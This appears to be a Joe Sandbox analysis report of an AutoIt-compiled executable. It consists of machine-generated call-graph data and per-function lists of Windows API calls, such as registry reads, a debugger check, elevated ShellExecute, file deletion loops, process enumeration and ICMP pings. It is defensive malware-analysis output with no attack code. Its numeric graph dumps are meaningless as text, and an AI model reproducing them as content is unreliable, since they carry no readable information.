99293 532f70 __cinit 67 API calls 99292->99293 99294 511096 99293->99294 99296 522fd5 __write_nolock 99295->99296 99297 521207 59 API calls 99296->99297 99298 52308b 99297->99298 99326 5300cf 99298->99326 99300 523094 99333 5308c1 99300->99333 99303 521900 59 API calls 99304 5230ad 99303->99304 99339 524c94 99304->99339 99307 521207 59 API calls 99308 5230c5 99307->99308 99309 5219e1 59 API calls 99308->99309 99310 5230ce RegOpenKeyExW 99309->99310 99311 5601a3 RegQueryValueExW 99310->99311 99315 5230f0 Mailbox 99310->99315 99312 560235 RegCloseKey 99311->99312 99313 5601c0 99311->99313 99312->99315 99325 560247 _wcscat Mailbox __wsetenvp 99312->99325 99314 530fe6 Mailbox 59 API calls 99313->99314 99316 5601d9 99314->99316 99315->99292 99317 52433f 59 API calls 99316->99317 99318 5601e4 RegQueryValueExW 99317->99318 99320 560201 99318->99320 99322 56021b 99318->99322 99319 521609 59 API 
calls 99319->99325 99321 521821 59 API calls 99320->99321 99321->99322 99322->99312 99323 521a36 59 API calls 99323->99325 99324 524c94 59 API calls 99324->99325 99325->99315 99325->99319 99325->99323 99325->99324 99327 541b70 __write_nolock 99326->99327 99328 5300dc GetModuleFileNameW 99327->99328 99329 521a36 59 API calls 99328->99329 99330 530102 99329->99330 99331 530284 60 API calls 99330->99331 99332 53010c Mailbox 99331->99332 99332->99300 99334 541b70 __write_nolock 99333->99334 99335 5308ce GetFullPathNameW 99334->99335 99336 5308f0 99335->99336 99337 521821 59 API calls 99336->99337 99338 52309f 99337->99338 99338->99303 99340 524ca2 99339->99340 99344 524cc4 _memmove 99339->99344 99342 530fe6 Mailbox 59 API calls 99340->99342 99341 530fe6 Mailbox 59 API calls 99343 5230bc 99341->99343 99342->99344 99343->99307 99344->99341 99345 5548fb 99346 51b020 274 API calls 99345->99346 99347 554912 99346->99347 99349 51cce0 99347->99349 99350 57a48d 89 API calls 4 library calls 99347->99350 99349->99349 99350->99349 99351 537e83 99352 537e8f __alloc_osfhnd 99351->99352 99388 53a038 GetStartupInfoW 99352->99388 99354 537e94 99390 538dac GetProcessHeap 99354->99390 99356 537eec 99357 537ef7 99356->99357 99473 537fd3 58 API calls 3 library calls 99356->99473 99391 539d16 99357->99391 99360 537efd 99361 537f08 __RTC_Initialize 99360->99361 99474 537fd3 58 API calls 3 library calls 99360->99474 99412 53d802 99361->99412 99364 537f17 99365 537f23 GetCommandLineW 99364->99365 99475 537fd3 58 API calls 3 library calls 99364->99475 99431 545153 GetEnvironmentStringsW 99365->99431 99368 537f22 99368->99365 99371 537f3d 99372 537f48 99371->99372 99476 5332e5 58 API calls 3 library calls 99371->99476 99441 544f88 99372->99441 99375 537f4e 99378 537f59 99375->99378 99477 5332e5 58 API calls 3 library calls 99375->99477 99455 53331f 99378->99455 99379 537f61 99380 537f6c __wwincmdln 99379->99380 99478 5332e5 58 API calls 3 library calls 99379->99478 99461 525f8b 99380->99461 
99383 537f80 99384 537f8f 99383->99384 99479 533588 58 API calls _doexit 99383->99479 99480 533310 58 API calls _doexit 99384->99480 99387 537f94 __alloc_osfhnd 99389 53a04e 99388->99389 99389->99354 99390->99356 99481 5333b7 36 API calls 2 library calls 99391->99481 99393 539d1b 99482 539f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 99393->99482 99395 539d20 99396 539d24 99395->99396 99484 539fba TlsAlloc 99395->99484 99483 539d8c 61 API calls 2 library calls 99396->99483 99399 539d29 99399->99360 99400 539d36 99400->99396 99401 539d41 99400->99401 99485 538a05 99401->99485 99404 539d83 99493 539d8c 61 API calls 2 library calls 99404->99493 99407 539d88 99407->99360 99408 539d62 99408->99404 99409 539d68 99408->99409 99492 539c63 58 API calls 4 library calls 99409->99492 99411 539d70 GetCurrentThreadId 99411->99360 99413 53d80e __alloc_osfhnd 99412->99413 99414 539e3b __lock 58 API calls 99413->99414 99415 53d815 99414->99415 99416 538a05 __calloc_crt 58 API calls 99415->99416 99418 53d826 99416->99418 99417 53d891 GetStartupInfoW 99425 53d8a6 99417->99425 99426 53d9d5 99417->99426 99418->99417 99419 53d831 __alloc_osfhnd @_EH4_CallFilterFunc@8 99418->99419 99419->99364 99420 53da9d 99507 53daad LeaveCriticalSection _doexit 99420->99507 99422 538a05 __calloc_crt 58 API calls 99422->99425 99423 53da22 GetStdHandle 99423->99426 99424 53da35 GetFileType 99424->99426 99425->99422 99425->99426 99427 53d8f4 99425->99427 99426->99420 99426->99423 99426->99424 99506 53a05b InitializeCriticalSectionAndSpinCount 99426->99506 99427->99426 99428 53d928 GetFileType 99427->99428 99505 53a05b InitializeCriticalSectionAndSpinCount 99427->99505 99428->99427 99432 545164 99431->99432 99433 537f33 99431->99433 99508 538a4d 58 API calls 2 library calls 99432->99508 99437 544d4b GetModuleFileNameW 99433->99437 99435 5451a0 FreeEnvironmentStringsW 99435->99433 99436 54518a _memmove 99436->99435 99438 544d7f _wparse_cmdline 99437->99438 99440 544dbf _wparse_cmdline 
99438->99440 99509 538a4d 58 API calls 2 library calls 99438->99509 99440->99371 99442 544fa1 __wsetenvp 99441->99442 99446 544f99 99441->99446 99443 538a05 __calloc_crt 58 API calls 99442->99443 99451 544fca __wsetenvp 99443->99451 99444 545021 99445 532f85 _free 58 API calls 99444->99445 99445->99446 99446->99375 99447 538a05 __calloc_crt 58 API calls 99447->99451 99448 545046 99450 532f85 _free 58 API calls 99448->99450 99450->99446 99451->99444 99451->99446 99451->99447 99451->99448 99452 54505d 99451->99452 99510 544837 58 API calls __woutput_l 99451->99510 99511 538ff6 IsProcessorFeaturePresent 99452->99511 99454 545069 99454->99375 99456 53332b __IsNonwritableInCurrentImage 99455->99456 99534 53a701 99456->99534 99458 533349 __initterm_e 99459 532f70 __cinit 67 API calls 99458->99459 99460 533368 __cinit __IsNonwritableInCurrentImage 99458->99460 99459->99460 99460->99379 99462 526044 99461->99462 99463 525fa5 99461->99463 99462->99383 99464 525fdf IsThemeActive 99463->99464 99537 53359c 99464->99537 99468 52600b 99549 525f00 SystemParametersInfoW SystemParametersInfoW 99468->99549 99470 526017 99550 525240 99470->99550 99472 52601f SystemParametersInfoW 99472->99462 99473->99357 99474->99361 99475->99368 99479->99384 99480->99387 99481->99393 99482->99395 99483->99399 99484->99400 99487 538a0c 99485->99487 99488 538a47 99487->99488 99490 538a2a 99487->99490 99494 545426 99487->99494 99488->99404 99491 53a016 TlsSetValue 99488->99491 99490->99487 99490->99488 99502 53a362 Sleep 99490->99502 99491->99408 99492->99411 99493->99407 99495 545431 99494->99495 99497 54544c 99494->99497 99496 54543d 99495->99496 99495->99497 99503 538d58 58 API calls __getptd_noexit 99496->99503 99499 54545c RtlAllocateHeap 99497->99499 99500 545442 99497->99500 99504 5335d1 DecodePointer 99497->99504 99499->99497 99499->99500 99500->99487 99502->99490 99503->99500 99504->99497 99505->99427 99506->99426 99507->99419 99508->99436 99509->99440 99510->99451 99512 539001 99511->99512 
99517 538e89 99512->99517 99516 53901c 99516->99454 99518 538ea3 _memset ___raise_securityfailure 99517->99518 99519 538ec3 IsDebuggerPresent 99518->99519 99525 53a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99519->99525 99521 538f87 ___raise_securityfailure 99526 53c826 99521->99526 99523 538faa 99524 53a370 GetCurrentProcess TerminateProcess 99523->99524 99524->99516 99525->99521 99527 53c830 IsProcessorFeaturePresent 99526->99527 99528 53c82e 99526->99528 99530 545b3a 99527->99530 99528->99523 99533 545ae9 5 API calls 2 library calls 99530->99533 99532 545c1d 99532->99523 99533->99532 99535 53a704 EncodePointer 99534->99535 99535->99535 99536 53a71e 99535->99536 99536->99458 99538 539e3b __lock 58 API calls 99537->99538 99539 5335a7 DecodePointer EncodePointer 99538->99539 99602 539fa5 LeaveCriticalSection 99539->99602 99541 526004 99542 533604 99541->99542 99543 533628 99542->99543 99544 53360e 99542->99544 99543->99468 99544->99543 99603 538d58 58 API calls __getptd_noexit 99544->99603 99546 533618 99604 538fe6 9 API calls __woutput_l 99546->99604 99548 533623 99548->99468 99549->99470 99551 52524d __write_nolock 99550->99551 99552 521207 59 API calls 99551->99552 99553 525258 GetCurrentDirectoryW 99552->99553 99605 524ec8 99553->99605 99555 52527e IsDebuggerPresent 99556 560b21 MessageBoxA 99555->99556 99557 52528c 99555->99557 99559 560b39 99556->99559 99558 5252a0 99557->99558 99557->99559 99673 5231bf 99558->99673 99713 52314d 59 API calls Mailbox 99559->99713 99563 560b49 99569 560b5f SetCurrentDirectoryW 99563->99569 99572 52536c Mailbox 99569->99572 99572->99472 99602->99541 99603->99546 99604->99548 99606 521207 59 API calls 99605->99606 99607 524ede 99606->99607 99715 525420 99607->99715 99609 524efc 99610 5219e1 59 API calls 99609->99610 99611 524f10 99610->99611 99612 521c9c 59 API calls 99611->99612 99613 524f1b 99612->99613 99614 51477a 59 API calls 99613->99614 99615 524f27 99614->99615 99616 521a36 59 API calls 99615->99616 99617 
524f34 99616->99617 99618 5139be 68 API calls 99617->99618 99619 524f44 Mailbox 99618->99619 99620 521a36 59 API calls 99619->99620 99621 524f68 99620->99621 99622 5139be 68 API calls 99621->99622 99623 524f77 Mailbox 99622->99623 99624 521207 59 API calls 99623->99624 99625 524f94 99624->99625 99729 5255bc 99625->99729 99628 53312d _W_store_winword 60 API calls 99629 524fae 99628->99629 99630 560a54 99629->99630 99631 524fb8 99629->99631 99632 5255bc 59 API calls 99630->99632 99633 53312d _W_store_winword 60 API calls 99631->99633 99634 560a68 99632->99634 99635 524fc3 99633->99635 99637 5255bc 59 API calls 99634->99637 99635->99634 99636 524fcd 99635->99636 99638 53312d _W_store_winword 60 API calls 99636->99638 99640 560a84 99637->99640 99639 524fd8 99638->99639 99639->99640 99641 524fe2 99639->99641 99642 5300cf 61 API calls 99640->99642 99643 53312d _W_store_winword 60 API calls 99641->99643 99644 560aa7 99642->99644 99645 524fed 99643->99645 99646 5255bc 59 API calls 99644->99646 99647 524ff7 99645->99647 99662 560ad0 99645->99662 99648 560ab3 99646->99648 99651 521c9c 59 API calls 99647->99651 99652 52501b 99647->99652 99650 521c9c 59 API calls 99648->99650 99649 5255bc 59 API calls 99653 560aee 99649->99653 99654 560ac1 99650->99654 99655 52500e 99651->99655 99656 5147be 59 API calls 99652->99656 99657 521c9c 59 API calls 99653->99657 99658 5255bc 59 API calls 99654->99658 99659 5255bc 59 API calls 99655->99659 99660 52502a 99656->99660 99661 560afc 99657->99661 99658->99662 99659->99652 99663 514540 59 API calls 99660->99663 99664 5255bc 59 API calls 99661->99664 99662->99649 99666 525038 99663->99666 99665 560b0b 99664->99665 99665->99665 99667 5143d0 59 API calls 99666->99667 99670 525055 99667->99670 99668 51477a 59 API calls 99668->99670 99669 5143d0 59 API calls 99669->99670 99670->99668 99670->99669 99671 5255bc 59 API calls 99670->99671 99672 52509b Mailbox 99670->99672 99671->99670 99672->99555 99674 5231cc __write_nolock 99673->99674 99675 560314 
[Graph edge data: the node and edge list of an interactive function-call graph in the original report, continued from the preceding lines; it is not reproduced here.]

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
• IsDebuggerPresent.KERNEL32 ref: 0052527E
• GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
  • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
  • Part of subcall function 0051BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
• SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00560B2E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00560B66
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005C6D10), ref: 00560BE9
• ShellExecuteW.SHELL32(00000000), ref: 00560BF0
  • Part of subcall function 0052514C: GetSysColorBrush.USER32(0000000F), ref: 00525156
  • Part of subcall function 0052514C: LoadCursorW.USER32(00000000,00007F00), ref: 00525165
  • Part of subcall function 0052514C: LoadIconW.USER32(00000063), ref: 0052517C
  • Part of subcall function 0052514C: LoadIconW.USER32(000000A4), ref: 0052518E
  • Part of subcall function 0052514C: LoadIconW.USER32(000000A2), ref: 005251A0
  • Part of subcall function 0052514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
  • Part of subcall function 0052514C: RegisterClassExW.USER32(?), ref: 0052521C
  • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
  • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
  • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 0052513E
  • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 00525147
  • Part of subcall function 005259D3: _memset.LIBCMT ref: 005259F9
  • Part of subcall function 005259D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
Strings
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00560B28
• runas, xrefs: 00560BE4
• AutoIt, xrefs: 00560B23
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 529118366-2030392706
• Opcode ID: 413437563810c6b74863b5eee370a1ab2a2de6457e2d0386e2c09d3a1c71353e
• Instruction ID: 1037bf8b2bc966fb061c743da6a132dd0e32f2d5d92b29bc22b9068d64528c63
• Opcode Fuzzy Hash: 413437563810c6b74863b5eee370a1ab2a2de6457e2d0386e2c09d3a1c71353e
• Instruction Fuzzy Hash: AA51053494469DAACB21EBB4EC09EFE7F78BFAA340F105467F451621E2EB700548DB21

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function starting at 00525D13 (basic blocks in 00525D13-00525EA2 and 00560FA9-005610C8); executed and not-executed blocks are distinguished in the original interactive graph. The block and edge list is not reproduced here.]
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00525D40
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,005A0A18,00000000,00000000,?), ref: 00525E07
                                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00525E0E
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00525E54
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00525E5F
                                                                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00525E90
                                                                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00525E9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1986165174-0

                                                                                                                                        Control-flow Graph (graph image not recoverable from the extraction; legend: Executed / Not Executed)
                                                                                                                                        control_flow_graph 1191 574005-57404c call 521207 * 3 call 530284 call 574fec 1202 57404e-574057 call 521900 1191->1202 1203 57405c-57408d call 530119 FindFirstFileW 1191->1203 1202->1203 1207 57408f-574091 1203->1207 1208 5740fc-574103 FindClose 1203->1208 1207->1208 1210 574093-574098 1207->1210 1209 574107-574129 call 521cb6 * 3 1208->1209 1212 5740d7-5740e9 FindNextFileW 1210->1212 1213 57409a-5740d5 call 521c9c call 5217e0 call 521900 DeleteFileW 1210->1213 1212->1207 1214 5740eb-5740f1 1212->1214 1213->1212 1226 5740f3-5740fa FindClose 1213->1226 1214->1207 1226->1209
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
                                                                                                                                          • Part of subcall function 00574FEC: GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057407C
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 005740CC
                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 005740DD
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 005740F4
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 005740FD
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0057416D
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0057417B
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0057419B
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00574245
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00523740: CharUpperBuffW.USER32(?,005D71DC,00000000,?,00000000,005D71DC,?,005153A5,?,?,?,?), ref: 0052375D
                                                                                                                                        • _memmove.LIBCMT ref: 0051B68A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2819905725-0
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 0051BF57
                                                                                                                                          • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 005536B5
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                                                        • API String ID: 1792118007-922114024

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00513444
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 0051346E
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 005134C2
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                        • API String ID: 2914291525-1005189915

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00513444
• RegisterClassExW.USER32(00000030), ref: 0051346E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
• InitCommonControlsEx.COMCTL32(?), ref: 0051349C
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
• LoadIconW.USER32(000000A9), ref: 005134C2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 8d310f31b5602bd18d17690dc46b783a1add32e454a1e1909f41f462c3aeb88f
• Instruction ID: 25b102b3a77566ee8336724e023f79f4093ba90e53db79b148ba8b387cf515a2
• Opcode Fuzzy Hash: 8d310f31b5602bd18d17690dc46b783a1add32e454a1e1909f41f462c3aeb88f
• Instruction Fuzzy Hash: E821E2B191521CAFEB109FA4EC88B9EBFF4FB19700F00511BF511A62A0E7B11548EF95

Control-flow Graph

APIs
  • Part of subcall function 005300CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00523094), ref: 005300ED
  • Part of subcall function 005308C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0052309F), ref: 005308E3
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005230E2
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005601BA
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005601FB
• RegCloseKey.ADVAPI32(?), ref: 00560239
• _wcscat.LIBCMT ref: 00560292
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 5572108f5159ced7b7ca3628a60c8594b653b3f92e989444476adf55c6f6c487
• Instruction ID: 1e3c58475aca5801140dfaf2f1fd08906663a6b68a3e178f02056758b1ba8591
• Opcode Fuzzy Hash: 5572108f5159ced7b7ca3628a60c8594b653b3f92e989444476adf55c6f6c487
• Instruction Fuzzy Hash: 7E715B7540A7129EC324EF25E89996BBFE8FFA5350F80052FF445832A0EF309948DB56

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00525156
• LoadCursorW.USER32(00000000,00007F00), ref: 00525165
• LoadIconW.USER32(00000063), ref: 0052517C
• LoadIconW.USER32(000000A4), ref: 0052518E
• LoadIconW.USER32(000000A2), ref: 005251A0
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
• RegisterClassExW.USER32(?), ref: 0052521C
  • Part of subcall function 00513411: GetSysColorBrush.USER32(0000000F), ref: 00513444
  • Part of subcall function 00513411: RegisterClassExW.USER32(00000030), ref: 0051346E
  • Part of subcall function 00513411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
  • Part of subcall function 00513411: InitCommonControlsEx.COMCTL32(?), ref: 0051349C
  • Part of subcall function 00513411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
  • Part of subcall function 00513411: LoadIconW.USER32(000000A9), ref: 005134C2
  • Part of subcall function 00513411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 8222ae2b7752fb80185ab391cf9154ab737902c6daf37c2b9c9562bf3bb4a936
• Instruction ID: 5965da18938c8688176a33a1e53bdae52e081e83b413fe9aac7513bae93cd959
• Opcode Fuzzy Hash: 8222ae2b7752fb80185ab391cf9154ab737902c6daf37c2b9c9562bf3bb4a936
• Instruction Fuzzy Hash: BB215774916358AFEB209FA4ED09B9D7FB4FB2D311F00415BF504A62E0E3B25558AF80

Control-flow Graph
(graph image not reproduced; legend: Executed / Not Executed. Node list recovered from the page: basic blocks 585e1d-585ffe, with WSAStartup at 585e74, inet_addr and gethostbyname at 585e9d, IcmpCreateFile at 585edd, IcmpSendEcho at 585f34 and 585f55, IcmpCloseHandle and WSACleanup at 585fd4)

APIs
• WSAStartup.WS2_32(00000101,?), ref: 00585E7E
• inet_addr.WSOCK32(?,?,?), ref: 00585EC3
• gethostbyname.WS2_32(?), ref: 00585ECF
• IcmpCreateFile.IPHLPAPI ref: 00585EDD
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585F4D
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00585F63
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00585FD8
• WSACleanup.WSOCK32 ref: 00585FDE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 059b12c06114b9f8599c892a89d2517e801e95747f8563608e61ca98c7f8231a
• Instruction ID: d610440a9313551d1272bb2d2002a502a49ac6afb1fe9342f406e2ba7ac739ef
• Opcode Fuzzy Hash: 059b12c06114b9f8599c892a89d2517e801e95747f8563608e61ca98c7f8231a
• Instruction Fuzzy Hash: A051B1716046019FD710EF24DC49B2ABBE4FF89710F044969FA95EB2E0EB30E944DB42

Control-flow Graph
